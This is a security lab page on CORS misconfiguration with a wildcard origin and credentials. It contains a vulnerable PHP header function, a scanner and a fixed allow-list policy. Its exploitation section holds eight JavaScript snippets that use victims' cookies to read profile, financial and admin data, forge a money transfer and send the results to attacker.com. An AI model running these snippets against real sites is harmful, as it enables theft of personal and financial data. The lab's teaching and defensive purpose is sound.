Lab 2: CORS with Wildcard Origin

CORS with wildcard origin allowing any domain

Difficulty: Medium

Lab Overview

This lab demonstrates a CORS policy that combines a wildcard origin (*) with Access-Control-Allow-Credentials: true. The intent of such a policy is to let any domain make authenticated requests and read the responses, which would be a critical misconfiguration. One caveat matters for exploitation: the Fetch standard makes browsers reject a credentialed cross-origin response whose Access-Control-Allow-Origin is *, so the wildcard by itself exposes only what the endpoint serves without credentials (still serious for an intranet or otherwise network-restricted service reached through the victim's browser). The fully exploitable form of the same mistake is a server that reflects the request's Origin header instead of sending *; the examples below assume one or the other, as noted in each.

Objective: Exploit wildcard CORS policies to steal sensitive data and perform unauthorized actions.

Vulnerable CORS Headers
// Vulnerable: Wildcard origin with credentials
function set_cors_headers() {
    header("Access-Control-Allow-Origin: *");
    header("Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS");
    header("Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, X-Custom-Header");
    header("Access-Control-Allow-Credentials: true");
    header("Access-Control-Expose-Headers: X-Sensitive-Data, X-API-Key, X-User-Info");
    
    // Handle preflight requests
    if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
        http_response_code(200);
        exit();
    }
}
Wildcard CORS Tester

The tester exercises the following headers from the vulnerable policy:

  • Access-Control-Allow-Origin: * - allows any origin to read the response, but only for requests made without credentials
  • Access-Control-Allow-Credentials: true - tells the browser the response may be shared with a credentialed request; combined with * it has no effect, because the Fetch standard requires an exact origin match whenever credentials are included
  • Access-Control-Expose-Headers: X-Sensitive-Data, X-API-Key, X-User-Info - makes these non-safelisted response headers readable by cross-origin scripts
  • Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, X-Custom-Header - lets preflighted requests carry these request headers (the server lists them explicitly rather than using *)
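To make the browser-side rule behind these bullets concrete, the following added example (not part of the lab) applies the CORS check a browser performs, per the Fetch standard, before a script may read a cross-origin response. It is run against two constructed header sets: the lab's wildcard policy and a policy that reflects the request's Origin. The attacker origin and the header values are assumptions for the example; redirects and the same-origin case are not modelled.

```javascript
// Added example, not part of the lab: the CORS check a browser applies
// (per the Fetch standard) before it lets a script read a cross-origin
// response, applied to constructed header sets: the lab's wildcard policy
// and a policy that reflects the request's Origin.

function evaluateCors(responseHeaders, requestOrigin, withCredentials) {
  // Header names are case-insensitive
  const get = (name) => {
    const key = Object.keys(responseHeaders)
      .find((k) => k.toLowerCase() === name.toLowerCase());
    return key === undefined ? null : responseHeaders[key];
  };
  const blocked = (reason) => ({ readable: false, reason, exposedHeaders: [] });

  const acao = get('Access-Control-Allow-Origin');
  const acac = get('Access-Control-Allow-Credentials');
  const expose = (get('Access-Control-Expose-Headers') || '')
    .split(',').map((h) => h.trim().toLowerCase()).filter(Boolean);

  if (acao === null) return blocked('no Access-Control-Allow-Origin header');

  if (!withCredentials) {
    // Anonymous request: "*" or an exact origin match is enough, and "*" in
    // Expose-Headers really does mean every header
    if (acao !== '*' && acao !== requestOrigin) {
      return blocked(`origin ${requestOrigin} does not match ${acao}`);
    }
    return { readable: true, reason: 'anonymous request allowed',
             exposedHeaders: expose.includes('*') ? ['*'] : expose };
  }

  // Credentialed request (cookies, HTTP auth, client certificates)
  if (acao === '*') return blocked('wildcard origin is rejected when credentials are included');
  if (acao !== requestOrigin) return blocked(`origin ${requestOrigin} does not match ${acao}`);
  if (acac !== 'true') return blocked('Access-Control-Allow-Credentials is not exactly "true"');
  // With credentials, "*" in Expose-Headers is a literal header name, not a wildcard
  return { readable: true, reason: 'credentialed request allowed',
           exposedHeaders: expose.filter((h) => h !== '*') };
}

// Constructed header sets (assumed values for the example)
const LAB_HEADERS = {
  'Access-Control-Allow-Origin': '*',
  'Access-Control-Allow-Credentials': 'true',
  'Access-Control-Expose-Headers': 'X-Sensitive-Data, X-API-Key, X-User-Info',
};
const reflectingHeaders = (origin) => ({
  'Access-Control-Allow-Origin': origin,
  'Access-Control-Allow-Credentials': 'true',
  'Access-Control-Expose-Headers': 'X-Sensitive-Data',
});

const ATTACKER = 'http://attacker.com';
console.log(evaluateCors(LAB_HEADERS, ATTACKER, true).reason);                    // wildcard rejected
console.log(evaluateCors(LAB_HEADERS, ATTACKER, false).readable);                 // true: anonymous read works
console.log(evaluateCors(reflectingHeaders(ATTACKER), ATTACKER, true).readable);  // true
```

The middle call is the one that matters for the lab as written: the wildcard policy lets any origin read the endpoint anonymously, including the three exposed headers, while the credentialed read is blocked before the response body is ever handed to the script. Swap in the reflecting policy and the same credentialed read succeeds.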
Sensitive API Endpoints

Try these sensitive endpoints:

  • ?action=profile - User profile with PII
  • ?action=financial - Financial data
  • ?action=admin - Admin panel data
Vulnerability Details
  • Type: CORS with Wildcard Origin
  • Severity: Critical
  • Method: GET/POST
  • Issue: Wildcard origin with credentials
Attack Vectors
  • Data Theft: Steal sensitive user data
  • Financial Fraud: Access financial information
  • Admin Takeover: Access admin panel data
  • Header Exposure: Read the response headers listed in Access-Control-Expose-Headers (X-Sensitive-Data, X-API-Key, X-User-Info)
Wildcard CORS Exploitation Examples

Use these techniques to exploit wildcard CORS policies. Each snippet runs on a page under the attacker's control (attacker.com) in the victim's browser. Keep in mind that a compliant browser refuses to expose a credentialed response when Access-Control-Allow-Origin is *, so against the lab's headers the credentialed variants below fail at the CORS check; they succeed when the server reflects the request's Origin instead, and the non-credentialed reads succeed against the wildcard as written.

1. Basic Wildcard CORS Exploitation:

// Runs on the attacker's origin. credentials: 'include' attaches the victim's
// cookies for vulnerable-site.com. There is no Authorization header: localStorage
// is scoped per origin, so the attacker's page cannot read a token the victim
// site stored. The custom header forces a preflight, which the vulnerable
// server answers with 200.
fetch('http://vulnerable-site.com/api?action=profile', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => {
    // Only the headers named in Access-Control-Expose-Headers are readable here
    const sensitiveData = response.headers.get('X-Sensitive-Data');
    const apiKey = response.headers.get('X-API-Key');
    const userInfo = response.headers.get('X-User-Info');
    console.log('Exposed headers:', { sensitiveData, apiKey, userInfo });
    return response.json();
})
.then(data => {
    console.log('Stolen profile data:', data);
    // Exfiltrate to the attacker's server
    fetch('http://attacker.com/steal-profile', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

2. Financial Data Theft:

// Same pattern against the financial endpoint; the victim's cookie is the
// only ambient credential the attacker can make the browser attach
fetch('http://vulnerable-site.com/api?action=financial', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: { 'Content-Type': 'application/json' }
})
.then(response => response.json())
.then(data => {
    console.log('Financial data stolen:', data);
    fetch('http://attacker.com/steal-financial', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
            timestamp: new Date().toISOString(),
            financialData: data
        })
    });
});

3. Admin Panel Access:

// Works only if the victim's browser already holds an admin session cookie
// for the target; the attacker cannot supply an admin token of its own
fetch('http://vulnerable-site.com/api?action=admin', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: { 'Content-Type': 'application/json' }
})
.then(response => response.json())
.then(data => {
    console.log('Admin data stolen:', data);
    // Use the stolen admin data
    if (data.admin_panel_url) {
        window.open(data.admin_panel_url, '_blank');
    }
    fetch('http://attacker.com/steal-admin', {
        method: 'POST',
        body: JSON.stringify(data)
    });
});

4. POST Request Exploitation:

// A JSON POST is preflighted, so without the permissive OPTIONS handler the
// browser would never send it. With it, the request goes out carrying the
// victim's cookies and the attacker can also read the response.
fetch('http://vulnerable-site.com/api', {
    method: 'POST',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'X-Custom-Header': 'malicious-value'
    },
    body: JSON.stringify({
        action: 'transfer_money',
        amount: 10000,
        to_account: 'attacker-account-12345'
    })
})
.then(response => response.json())
.then(data => {
    console.log('Money transfer result:', data);
});

5. Header Manipulation:

// Collect every readable response header. `headers` is declared outside the
// promise chain so that both callbacks can see it.
const headers = {};
fetch('http://vulnerable-site.com/api?action=profile', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'X-Custom-Header': 'malicious-value',
        'X-Requested-With': 'XMLHttpRequest'
    }
})
.then(response => {
    // forEach yields the CORS-safelisted headers plus those in Expose-Headers
    response.headers.forEach((value, key) => {
        headers[key] = value;
    });
    console.log('All response headers:', headers);
    return response.json();
})
.then(data => {
    console.log('Data with headers:', { data, headers });
});

6. Cookie-Authenticated Request Without Preflight:

// A plain GET with no custom headers is a "simple" request: no preflight, the
// browser sends it straight away with the victim's cookies attached. The
// cookies themselves are never readable: document.cookie on the attacker's
// page returns only the attacker's own cookies. What leaks is the response
// those cookies authorize.
fetch('http://vulnerable-site.com/api?action=profile', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors'
})
.then(response => response.json())
.then(data => {
    fetch('http://attacker.com/steal-cookies', {
        method: 'POST',
        body: JSON.stringify({
            data: data,
            timestamp: new Date().toISOString()
        })
    });
});

7. Real-time Data Monitoring:

// Poll the endpoint for as long as the victim keeps the attacker's page open
setInterval(() => {
    fetch('http://vulnerable-site.com/api?action=financial', {
        method: 'GET',
        credentials: 'include',
        mode: 'cors'
    })
    .then(response => response.json())
    .then(data => {
        console.log('Real-time financial data:', data);
        fetch('http://attacker.com/monitor-financial', {
            method: 'POST',
            body: JSON.stringify({
                timestamp: new Date().toISOString(),
                data: data
            })
        });
    });
}, 30000); // Every 30 seconds

8. Advanced Header Exploitation:

// Walk every sensitive endpoint and exfiltrate the body plus all readable headers
async function exploitAllHeaders() {
    const endpoints = ['profile', 'financial', 'admin'];
    for (const endpoint of endpoints) {
        try {
            const response = await fetch(`http://vulnerable-site.com/api?action=${endpoint}`, {
                method: 'GET',
                credentials: 'include',
                mode: 'cors',
                headers: {
                    'Content-Type': 'application/json',
                    'X-Custom-Header': 'malicious-value'
                }
            });
            const headers = {};
            response.headers.forEach((value, key) => {
                headers[key] = value;
            });
            const data = await response.json();
            console.log(`${endpoint} data and headers:`, { data, headers });
            fetch('http://attacker.com/steal-all', {
                method: 'POST',
                body: JSON.stringify({
                    endpoint: endpoint,
                    data: data,
                    headers: headers,
                    timestamp: new Date().toISOString()
                })
            });
        } catch (error) {
            // A read blocked by the CORS check surfaces here as a TypeError
            console.error(`Failed to exploit ${endpoint}:`, error);
        }
    }
}
exploitAllHeaders();
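Before running any of the exploits above, a tester needs to know which of the server-side behaviours the target actually has: a plain wildcard, a reflected Origin, or an over-broad allow-list match. The following added example (not part of the lab) sends a set of crafted Origin values and classifies each answer. The target URL, the probe origins and the three fake servers are constructed for the example; the live variant assumes Node's fetch, which, unlike a browser, lets you set the Origin header.

```javascript
// Added example, not part of the lab: probes how a server answers a set of
// Origin values and classifies each answer, to distinguish a plain wildcard
// (anonymous reads only) from a reflected origin (cookie-authenticated reads)
// and from over-broad matching. The target URL and the fake servers are
// constructed for this example.

function probeOrigins(targetUrl) {
  const host = new URL(targetUrl).host;
  return [
    'http://attacker.com',            // unrelated origin
    'null',                           // sandboxed iframe, file:// page, redirect
    `https://${host}.attacker.com`,   // defeats a startsWith(host) check
    `https://attacker${host}`,        // defeats an endsWith(host) check
    `https://sub.${host}`,            // trusted subdomain (XSS there becomes full access)
  ];
}

// Classify one answer from the attacker's point of view
function classifyAnswer(sentOrigin, acao, acac) {
  if (acao === null || acao === undefined) return 'no-cors';
  if (acao === '*') return 'wildcard';            // readable without credentials only
  if (acao === sentOrigin) {
    return acac === 'true' ? 'reflected-with-credentials' : 'reflected';
  }
  return 'fixed-origin';                          // a value we did not send
}

// transport(url, origin) returns { acao, acac } synchronously (fakes below);
// for a live target use probeCorsLive, which adapts fetch to the same shape
function probeCors(targetUrl, transport) {
  return probeOrigins(targetUrl).map((origin) => {
    const { acao = null, acac = null } = transport(targetUrl, origin);
    return { origin, acao, acac, verdict: classifyAnswer(origin, acao, acac) };
  });
}

async function probeCorsLive(targetUrl) {
  const answers = {};
  for (const origin of probeOrigins(targetUrl)) {
    // Assumption: Node's fetch, which does not enforce the browser's forbidden-header list
    const res = await fetch(targetUrl, { headers: { Origin: origin } });
    answers[origin] = {
      acao: res.headers.get('access-control-allow-origin'),
      acac: res.headers.get('access-control-allow-credentials'),
    };
  }
  return probeCors(targetUrl, (_url, origin) => answers[origin]);
}

// Worst verdict first, so a scanner can report a single finding per target
function summarize(results) {
  const order = ['reflected-with-credentials', 'reflected', 'wildcard', 'fixed-origin', 'no-cors'];
  return order.find((v) => results.some((r) => r.verdict === v));
}

// Constructed fake servers standing in for three server-side policies
const wildcardServer = () => ({ acao: '*', acac: 'true' });                 // the lab's policy
const reflectingServer = (_url, origin) => ({ acao: origin, acac: 'true' }); // echoes any Origin
const suffixMatchServer = (url, origin) => {
  const host = new URL(url).host;
  // Vulnerable allow-list check: "ends with our host" also accepts attackervulnerable-site.com
  return origin.endsWith(host) ? { acao: origin, acac: 'true' } : {};
};

const TARGET = 'http://vulnerable-site.com/api?action=profile';
console.log(summarize(probeCors(TARGET, wildcardServer)));      // wildcard
console.log(summarize(probeCors(TARGET, reflectingServer)));    // reflected-with-credentials
console.log(summarize(probeCors(TARGET, suffixMatchServer)));   // reflected-with-credentials
```

The suffix-match server is the instructive case: it rejects attacker.com outright, so a single-origin test would call it safe, yet the "attackervulnerable-site.com" probe gets its origin reflected with credentials, which is exactly the condition the exploits above need.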
Mitigation Strategies
  • Never send Access-Control-Allow-Origin: * together with Access-Control-Allow-Credentials: true; browsers reject the combination, and its presence signals that credentials were meant to be shared with everyone
  • Compare the request's Origin header against an allow-list of exact origins (scheme, host and port) and echo only a matching value; never reflect arbitrary origins, never trust the "null" origin, and avoid prefix, suffix or regex matching
  • Send Vary: Origin whenever the response depends on the request's Origin, so shared caches do not serve one origin's headers to another
  • Keep Access-Control-Allow-Methods and Access-Control-Allow-Headers to what cross-origin clients actually need
  • Audit Access-Control-Expose-Headers and expose nothing beyond the CORS-safelisted response headers; secrets such as API keys do not belong in response headers at all
  • Keep authentication and authorization checks on every endpoint; CORS is a browser-side read policy, not an access-control mechanism, and it does nothing against direct requests
  • Content Security Policy governs what a page may load, not who may read your responses, so it is no substitute for a correct origin check
  • Monitor for cross-origin requests with unexpected Origin values, and apply rate limiting and request validation on sensitive endpoints
  • Include CORS configuration in regular security testing and vulnerability assessments
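The policy described in the mitigation list, and the corrected counterpart of the vulnerable set_cors_headers() function shown at the top of the lab, as an added example (not part of the lab, and not a port of its PHP). It is a pure function so it can be unit-tested; the allow-listed origins are assumptions for the example.

```javascript
// Added example, not part of the lab: the allow-list policy from the
// mitigation list as a pure, testable function. The allowed origins are
// assumptions for this example.

// Exact origins (scheme + host + port), never patterns
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com:8443',
]);

// Returns the response headers for a request carrying the given Origin.
// Unknown, missing and "null" origins get no Access-Control-* headers at
// all, so the browser blocks the cross-origin read.
function corsHeadersFor(requestOrigin, allowedOrigins = ALLOWED_ORIGINS) {
  // Vary on Origin unconditionally so a shared cache never hands one
  // origin's Access-Control-Allow-Origin to another
  const headers = { 'Vary': 'Origin' };

  if (typeof requestOrigin !== 'string') return headers;   // same-origin or non-browser client
  if (requestOrigin === 'null') return headers;            // sandboxed iframe / file page: untrusted
  if (!allowedOrigins.has(requestOrigin)) return headers;  // exact match only, no prefix/suffix/regex

  return {
    ...headers,
    'Access-Control-Allow-Origin': requestOrigin,          // echo the matched value, never "*"
    'Access-Control-Allow-Credentials': 'true',            // safe only because the origin is allow-listed
    'Access-Control-Allow-Methods': 'GET, POST',
    'Access-Control-Allow-Headers': 'Content-Type',
    'Access-Control-Max-Age': '600',
    // No Access-Control-Expose-Headers: secrets do not belong in response headers
  };
}

// Preflight handling: an allowed origin gets 204 with the headers above; any
// other origin gets 403 and no CORS headers
function handlePreflight(requestOrigin) {
  const headers = corsHeadersFor(requestOrigin);
  const allowed = 'Access-Control-Allow-Origin' in headers;
  return { status: allowed ? 204 : 403, headers };
}

// Constructed requests
console.log(corsHeadersFor('https://app.example.com'));               // echoed origin, credentials true
console.log(corsHeadersFor('https://app.example.com.attacker.com'));  // { Vary: 'Origin' } only
console.log(handlePreflight('null').status);                          // 403
```

The two probe origins that defeat naive matching, a trusted host used as a prefix and a trusted host used as a suffix, both fall through to the bare Vary header here because the comparison is a Set lookup on the whole origin string; nothing short of an exact entry in ALLOWED_ORIGINS gets a credentialed response.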